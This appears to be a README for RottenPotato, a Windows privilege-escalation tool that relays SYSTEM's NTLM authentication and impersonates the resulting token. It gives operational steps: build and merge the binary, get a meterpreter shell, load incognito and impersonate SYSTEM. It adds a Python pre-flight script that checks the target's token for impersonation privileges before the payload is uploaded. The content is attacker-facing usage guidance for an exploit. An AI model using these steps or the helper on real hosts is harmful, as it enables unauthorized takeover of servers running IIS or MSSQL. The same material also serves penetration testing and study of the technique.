RottenPotato local privilege escalation from service account to SYSTEM
RottenPotato – Local Privilege Escalation from Windows Service Accounts to SYSTEM
The idea behind this vulnerability is simple to describe at a high level:
- Trick the "NT AUTHORITY\SYSTEM" account into authenticating via NTLM to a TCP endpoint we control.
- Man-in-the-middle this authentication attempt (NTLM relay) to locally negotiate a security token for the "NT AUTHORITY\SYSTEM" account. This is done through a series of Windows API calls.
- Impersonate the token we have just negotiated. This can only be done if the attacker's current account holds a privilege that allows it to use another account's token (SeImpersonatePrivilege, or SeAssignPrimaryTokenPrivilege). This is true of most service accounts (e.g. the accounts IIS and MSSQL run under) and not true of most user-level accounts, so check `whoami /priv` first: the privilege only needs to be present in the token, not already "Enabled".
Usage:
- Compile.
- Use ILMerge to combine Potato.exe, SharpCifs.dll, NHttp.dll, and Microsoft.VisualStudio.OLE.Interop.dll. This will produce a single, portable binary.
- Get a meterpreter shell on the target system (running as an account that has SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege).
- use incognito (newer Metasploit versions use `load incognito`; `use` remains an alias).
- Run the binary from step 2.
- impersonate_token "NT AUTHORITY\SYSTEM" (in the meterpreter console the backslash usually has to be escaped: `impersonate_token "NT AUTHORITY\\SYSTEM"`).
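The pre-flight check the third bullet of the description and the usage steps above both rely on, as an added example that is not part of the RottenPotato project: it parses the output of `whoami /priv` on the target and reports whether the current token holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, so you know before uploading the binary whether the final impersonation step can succeed. The two `whoami /priv` outputs embedded below are constructed samples in the real command's layout, not captures from a host; `live_check` runs the real command when executed on Windows.

```python
"""Pre-flight check for RottenPotato-style token impersonation.

Parses `whoami /priv` output and reports whether the current token holds
one of the privileges needed to impersonate the SYSTEM token obtained
from the relayed NTLM authentication.
"""
import re
import subprocess
import sys

# Either privilege is sufficient. A privilege listed as "Disabled" is still
# present in the token and can be enabled by the process itself
# (AdjustTokenPrivileges), so presence is what matters, not the State column.
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Constructed sample (not a real capture): what a typical service account
# such as the IIS application pool identity or the MSSQL service account shows.
SAMPLE_SERVICE_ACCOUNT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# Constructed sample (not a real capture): a standard interactive user,
# which lacks both impersonation privileges.
SAMPLE_STANDARD_USER = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
"""

# A privilege row: the Se...Privilege name, a free-text description,
# and the State column (Enabled/Disabled) at the end of the line.
_ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege_name: state} from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = _ROW.match(line.rstrip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def held_impersonation_privs(privs):
    """Sorted list of the usable impersonation privileges in the token."""
    return sorted(IMPERSONATION_PRIVS & set(privs))


def can_impersonate(privs):
    """True if impersonate_token "NT AUTHORITY\\SYSTEM" can be expected to work."""
    return bool(held_impersonation_privs(privs))


def live_check():
    """Run the real `whoami /priv` (Windows only) and parse it."""
    out = subprocess.run(["whoami", "/priv"], capture_output=True,
                         text=True, check=True).stdout
    return parse_whoami_priv(out)


if __name__ == "__main__":
    # On Windows inspect the current token; elsewhere demonstrate on the sample.
    privs = live_check() if sys.platform == "win32" else parse_whoami_priv(SAMPLE_SERVICE_ACCOUNT)
    held = held_impersonation_privs(privs)
    if held:
        print("token holds %s: RottenPotato impersonation should be possible" % ", ".join(held))
    else:
        print("neither SeImpersonatePrivilege nor SeAssignPrimaryTokenPrivilege held: "
              "impersonate_token will fail from this account")
```

Run it from the shell you already have on the target (or feed it a saved `whoami /priv` capture) before going through the ILMerge and upload steps; a standard user token gives the negative result, and the fix in that case is a different foothold, not a different Potato build.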
Demo
Rotten Potato – MSSQL Privilege Escalation
Rotten Potato – IIS Privilege Escalation
For a technical overview of this exploit see our blog post here.